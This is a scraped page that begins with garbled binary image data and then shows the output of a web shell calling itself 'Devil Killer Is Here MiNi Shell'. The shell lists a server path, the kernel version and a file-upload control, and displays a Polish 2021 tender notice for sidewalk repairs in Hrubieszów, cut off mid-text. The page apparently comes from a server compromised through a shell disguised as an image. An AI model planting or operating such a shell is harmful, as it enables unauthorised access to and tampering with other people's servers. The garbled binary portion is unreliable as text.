JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210715/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210715/0011531301-N-2021.html

<header hidden><table style="border-bottom: 1px solid black; width:100%"><tr><td>Ogłoszenie nr 2021/BZP 00115313 z dnia 2021-07-15</td></tr></table></header><main><!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> „Remont chodników przy drogach powiatowych będących w administracji Powiatowego Zarządu Dróg w Hrubieszowie w granicach istniejącego pasa drogowego na terenie Gminy Miejskiej Hrubieszów” </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Powiatowy Zarząd Dróg w Hrubieszowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 950371643</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Grabowiecka 18b</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Hrubieszów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">22-500</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">lubelskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL812 - Chełmsko-zamojski</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">846962195</span></h3> <h3 class="mb-0">1.5.8.) Numer faksu: <span class="normal">846962595</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">sekretariat@pzd.powiathrubieszow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://www.pzdh.hrubieszow.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Budownictwo i obiekty komunalne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> „Remont chodników przy drogach powiatowych będących w administracji Powiatowego Zarządu Dróg w Hrubieszowie w granicach istniejącego pasa drogowego na terenie Gminy Miejskiej Hrubieszów” </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-56ec0c47-e54b-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00115313</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-07-15</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00003148/06/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Remont dróg i chodników (system zlecony)</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> : http://www.pzdh.hrubieszow.pl/ <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">: http://www.pzdh.hrubieszow.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Zamawiający określa dopuszczalny format kwalifikowanego podpisu elektronicznego, jako:<br/>a) dokumenty w formacie „pdf" zaleca się podpisywać formatem PAdES,<br/>b) dopuszcza się podpisanie dokumentów w formacie innym niż „pdf", wtedy będzie wymagany<br/>oddzielny plik z podpisem. W związku z tym Wykonawca będzie zobowiązany załączyć oprócz<br/>podpisanego dokumentu oddzielny plik z podpisem.<br/>9. Zamawiający, zgodnie art. 67 oraz art. 134 ust. 1 pkt 10 PZP określa niezbędne wymagania<br/>sprzętowo-aplikacyjne umożliwiające pracę na Platformie tj.:<br/>a) Stały dostęp do sieci Internet o gwarantowanej przepustowości nie mniejszej niż 512 kb/s;<br/>b) Komputer klasy PC lub MAC, o następującej konfiguracji: pamięć min 2GB Ram, procesor Intel IV<br/>2GHZ, jeden z systemów operacyjnych - MS Windows 7, Mac Os x 10.4, Linux, lub ich nowsze wersje;<br/>c) Zainstalowana dowolna przeglądarka internetowa obsługująca TLS 1.2, najlepiej w najnowszej<br/>wersji w przypadku Internet Explorer minimalnie wersja 10.0;<br/>d) Zainstalowany program Acrobat Reader lub inny obsługujący pliki w formacie .pdf.<br/>10. Zamawiający, określa dopuszczalne formaty przesyłanych danych tj. plików o wielkości do 100 MB<br/>w pdf, odt, ods, doc, xls, docx, xlsx, zip, 7z.<br/>11. Zamawiający określa informacje na temat kodowania i czasu odbioru danych tj. plik załączony<br/>przez Wykonawcę na Platformie Zakupowej i zapisany, widoczny jest w Systemie jako zaszyfrowany –<br/>format kodowania UTF8. Możliwość otworzenia pliku dostępna jest dopiero po odszyfrowaniu przez<br/>Zamawiającego po upływie terminu otwarcia ofert.<br/>12. Oznaczenie czasu odbioru danych przez Platformę stanowi datę oraz dokładny czas (hh:mm:ss)<br/>Ogłoszenie nr 2021/BZP 00098036/01 z dnia 2021-06-29<br/>2021-06-29 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>generowany wg. czasu lokalnego serwera synchronizowanego odpowiednim źródłem czasu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">: Realizując art. 13 ust. 1 i ust. 2 Rozporządzenia<br/>Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz.U.UE.L.2016.119.1 z<br/>dnia 2016.05.04), dalej „RODO”, informuję, iżAdministratorem Danych Osobowych jest Powiatowy<br/>Zarządu Dróg w Hrubieszowie,ul. Grabowiecka 18b, 22-500 Hrubieszówtel. (0-84) 6962091, fax.<br/>6962595, mail: sekretariat@pzd.powiathrubieszow.pl 1. Administrator wyznaczył Inspektora Danych<br/>Osobowych, z którym można się kontaktować w sprawach ochrony danych osobowych pod numerem<br/>telefonu 84 696 20 91 lub bezpośrednio w biurze Administratora.2. Dane osobowe przetwarzane będą<br/>w celu realizacji procedury składania ofert na zapytania ofertowe, przetargi ogłaszane przez Powiatowy<br/>Zarząd Dróg w Hrubieszowie, na podstawie ustawy zz dnia 11 września 2019r. Prawo zamówień<br/>publicznych (Dz. U. z .2019r., ze zm.)Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6<br/>ust. 1 lit. c RODO w celu związanym z postępowaniem o udzielenie zamówienia publicznego 3.<br/>Podstawą prawną przetwarzania danych osobowych, pozyskanych przez Powiatowy Zarząd Dróg w<br/>Hrubieszowie jest zgoda osoby, której dane dotyczą obowiązujące przepisy prawa oraz zawarte<br/>umowy (art. 6 ust. 1 lit. „c”Rozporządzenia RODO oraz Ustawa Prawo Zamówień Publicznych).4. Dane<br/>osobowe oferentów będą przechowywane przez okres niezbędny do realizacji celów określonych w pkt<br/>2, a po tym czasie przez okres oraz w zakresie wymaganym przez przepisy powszechnie<br/>obowiązującego prawa, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres<br/>przechowywania obejmuje cały czas trwania umowy; 5. Odbiorcami danych osobowych będą osoby lub<br/>podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96<br/>ust. 3 ustawy z dnia 29 stycznia 2004 r. – Prawo zamówień publicznych (Dz. U. z 2018. Poz. 1986),<br/>dalej „ustawa Pzp”; 6. Podanie danych osobowych jest dobrowolne ale niezbędne do skutecznego<br/>złożenia oferty. Obowiązek podania przez danych osobowych jest wymogiem ustawowym<br/>określonymw przepisach ustawy Pzp, związanym z udziałem w postępowaniu o udzielenie zamówienia<br/>publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp7. Dane osobowe<br/>nie będą udostępniane podmiotom innym, niż upoważnione na podstawie przepisów prawa.8.<br/>Powiatowy Zarząd Dróg w Hrubieszowie nie przetwarza danych osobowych w sposób<br/>zautomatyzowany, nie dokonuje ich profilowania, nie przekazuje do państw trzecich.9. W przypadku,<br/>gdy przetwarzanie danych osobowych odbywa się na podstawie zgody osoby na przetwarzanie danych<br/>osobowych (art. 6 ust. 1 lit a RODO), przysługuje Pani/Panu prawo do cofnięcia tej zgodyw dowolnym<br/>momencie. Cofnięcie to nie ma wpływu na zgodność przetwarzania, którego dokonanona podstawie<br/>zgody przed jej cofnięciem, z obowiązującym prawem.10. W związku z przetwarzaniem danych przez<br/>Administratora Danych Osobowych przysługuje Pani/Panu:• na podstawie art. 15 RODO prawo<br/>dostępu do danych osobowych Pani/Pana dotyczących;• na podstawie art. 16 RODO prawo do<br/>sprostowania Pani/Pana danych osobowych;• na podstawie art. 18 RODO prawo żądania od<br/>administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których<br/>mowa w art. 18 ust. 2 RODO; • prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych<br/>Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza<br/>przepisy RODO;</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">PZD-1.343.19.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont chodnika przy ul. Targowej w Hrubieszowie, przy drodze powiatowej nr 3482 L o dł. 50 mb; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111300-1 - Roboty rozbiórkowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona z uwzględnieniem kryteriów opisanych w<br/>niniejszym rozdziale:<br/>Opis kryterium Ranga<br/>Cena [C] 60%<br/>Oferowany okres gwarancji [G] 40 %<br/>2. Obliczenie liczby punktów za kryterium cena [C], nastąpi według wzoru:<br/>cena najtańszej oferty<br/>C = x 60 pkt<br/>cena oferty badanej<br/>3. Obliczenie liczby punktów za kryterium oferowany okres gwarancji i rękojmi [G] nastąpi według<br/>wzoru:<br/>okres gwarancji w ofercie ocenianej<br/>G = x 40 pkt<br/>najdłuższy oferowany okres gwarancji w ofertach<br/>(nie więcej niż 60 miesięcy)<br/>przy czym:<br/>1) minimalny wymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy; oferty w których<br/>zaoferowany krótszy okres gwarancji, zostaną odrzucone jako niezgodne z SWZ;<br/>2) jeżeli Wykonawca nie wskaże w ofercie terminu gwarancji, Zamawiający przyjmie, że Wykonawca<br/>oferuje minimalny wymagany okres gwarancji, tj. 36 miesięcy;<br/>3) Wykonawca może zaoferować tylko jeden okres gwarancji określony w miesiącach np. 50 miesięcy.<br/>Jeżeli Wykonawca nie wskaże konkretnej ilości miesięcy tylko kilka miesięcy lub zakres, Zamawiający<br/>przyjmie, że Wykonawca zaoferował najkrótszy podany okres gwarancji;<br/>4) jeżeli Wykonawca wskaże niepełne miesiące, Zamawiający przyjmie, że Wykonawca zaoferował<br/>okres krótszy poprzez zaokrąglenie jego w dół;<br/>5) maksymalny punktowany przez Zamawiającego okres gwarancji to 60 miesięcy. Zaoferowanie<br/>okresu dłuższego spowoduje przyjęcie przez Zamawiającego do oceny i porównania ofert okresu 60 –<br/>miesięcznego, przy czym w umowie zostanie wskazany okres gwarancji wskazany przez Wykonawcę<br/>w ofercie.<br/>4. Łączna liczba punktów przyznana ofercie stanowi sumę punktów za kryteria wskazane w ust. 1.<br/>Zamawiający dokona oceny ofert, obliczając wartość punktów z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z następującymi zasadami:<br/>4) końcówki poniżej 0,0005 pkt pomija się,<br/>Ogłoszenie nr 2021/BZP 00098036/01 z dnia 2021-06-29<br/>2021-06-29 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>5) końcówki wynoszące 0,005 pkt i więcej zaokrągla się do 0,01 pkt.<br/>5. Na podstawie art. 223 ust. 2 w zw. z art. 266 PZP, Zamawiający poprawia w tekście oferty:<br/>1) oczywiste omyłki pisarskie;<br/>2) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych<br/>poprawek, w szczególności:<br/>1) w przypadku niezgodności pomiędzy ceną oferty w formularzu ofertowym wpisaną liczbą lub<br/>słownie, odczytaną podczas otwarcia ofert, a ceną oferty wynikającą ze Zbiorczego zestawienia<br/>kosztów, za cenę oferty przyjmuje się cenę wynikającą ze Zbiorczego zestawienia kosztów;<br/>2) jeżeli obliczona w Zbiorczym zestawieniu kosztów wartość brutto (cena oferty) nie odpowiada sumie<br/>kosztów netto poszczególnych pozycji oraz podanej wartości podatku VAT, przyjmuje się, że<br/>prawidłowo podano koszt netto każdej pozycji oraz wartość podatku VAT.<br/>3) inne omyłki polegające na niezgodności oferty z dokumentami zamówienia, niepowodujące istotnych<br/>zmian w treści oferty;<br/>- niezwłocznie zawiadamiając o tym wykonawcę, którego oferta została poprawiona.<br/>POUCZENIE:<br/>Wykonawca, w którego ofercie poprawiono omyłkę, o której mowa w art. 223 ust. 2 pkt 3 PZP, ma<br/>prawo w terminie wyznaczonym przez Zamawiającego liczonym od dnia otrzymania zawiadomienia o<br/>poprawieniu omyłki, do wyrażenia zgody na poprawienie w ofercie omyłki lub zakwestionowanie jej<br/>poprawienia.<br/>Brak odpowiedzi w wyznaczonym terminie uznaje się za wyrażenie zgody na poprawienie omyłki.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta:<br/>1) spełnia wszystkie wymagania zawarte w ustawie Prawo zamówień publicznych;<br/>2) spełnia wszystkie wymagania określone w SWZ;<br/>3) została uznana za najkorzystniejszą w oparciu o określone w SWZ kryteria oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Remont chodnika przy ul. Narutowicza w Hrubieszowie przy drodze powiatowej nr 3474 L o dł. 191,6 mb; </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45111300-1 - Roboty rozbiórkowe</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45233000-9 - Roboty w zakresie konstruowania, fundamentowania oraz wykonywania nawierzchni autostrad, dróg</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">90 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Oferta zostanie oceniona z uwzględnieniem kryteriów opisanych w<br/>niniejszym rozdziale:<br/>Opis kryterium Ranga<br/>Cena [C] 60%<br/>Oferowany okres gwarancji [G] 40 %<br/>2. Obliczenie liczby punktów za kryterium cena [C], nastąpi według wzoru:<br/>cena najtańszej oferty<br/>C = x 60 pkt<br/>cena oferty badanej<br/>3. Obliczenie liczby punktów za kryterium oferowany okres gwarancji i rękojmi [G] nastąpi według<br/>wzoru:<br/>okres gwarancji w ofercie ocenianej<br/>G = x 40 pkt<br/>najdłuższy oferowany okres gwarancji w ofertach<br/>(nie więcej niż 60 miesięcy)<br/>przy czym:<br/>1) minimalny wymagany przez Zamawiającego okres gwarancji wynosi 36 miesięcy; oferty w których<br/>zaoferowany krótszy okres gwarancji, zostaną odrzucone jako niezgodne z SWZ;<br/>2) jeżeli Wykonawca nie wskaże w ofercie terminu gwarancji, Zamawiający przyjmie, że Wykonawca<br/>oferuje minimalny wymagany okres gwarancji, tj. 36 miesięcy;<br/>3) Wykonawca może zaoferować tylko jeden okres gwarancji określony w miesiącach np. 50 miesięcy.<br/>Jeżeli Wykonawca nie wskaże konkretnej ilości miesięcy tylko kilka miesięcy lub zakres, Zamawiający<br/>przyjmie, że Wykonawca zaoferował najkrótszy podany okres gwarancji;<br/>4) jeżeli Wykonawca wskaże niepełne miesiące, Zamawiający przyjmie, że Wykonawca zaoferował<br/>okres krótszy poprzez zaokrąglenie jego w dół;<br/>5) maksymalny punktowany przez Zamawiającego okres gwarancji to 60 miesięcy. Zaoferowanie<br/>okresu dłuższego spowoduje przyjęcie przez Zamawiającego do oceny i porównania ofert okresu 60 –<br/>miesięcznego, przy czym w umowie zostanie wskazany okres gwarancji wskazany przez Wykonawcę<br/>w ofercie.<br/>4. Łączna liczba punktów przyznana ofercie stanowi sumę punktów za kryteria wskazane w ust. 1.<br/>Zamawiający dokona oceny ofert, obliczając wartość punktów z dokładnością do dwóch miejsc po<br/>przecinku, zgodnie z następującymi zasadami:<br/>4) końcówki poniżej 0,0005 pkt pomija się,<br/>Ogłoszenie nr 2021/BZP 00098036/01 z dnia 2021-06-29<br/>2021-06-29 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Roboty budowlane<br/>5) końcówki wynoszące 0,005 pkt i więcej zaokrągla się do 0,01 pkt.<br/>5. Na podstawie art. 223 ust. 2 w zw. z art. 266 PZP, Zamawiający poprawia w tekście oferty:<br/>1) oczywiste omyłki pisarskie;<br/>2) oczywiste omyłki rachunkowe, z uwzględnieniem konsekwencji rachunkowych dokonanych<br/>poprawek, w szczególności:<br/>1) w przypadku niezgodności pomiędzy ceną oferty w formularzu ofertowym wpisaną liczbą lub<br/>słownie, odczytaną podczas otwarcia ofert, a ceną oferty wynikającą ze Zbiorczego zestawienia<br/>kosztów, za cenę oferty przyjmuje się cenę wynikającą ze Zbiorczego zestawienia kosztów;<br/>2) jeżeli obliczona w Zbiorczym zestawieniu kosztów wartość brutto (cena oferty) nie odpowiada sumie<br/>kosztów netto poszczególnych pozycji oraz podanej wartości podatku VAT, przyjmuje się, że<br/>prawidłowo podano koszt netto każdej pozycji oraz wartość podatku VAT.<br/>3) inne omyłki polegające na niezgodności oferty z dokumentami 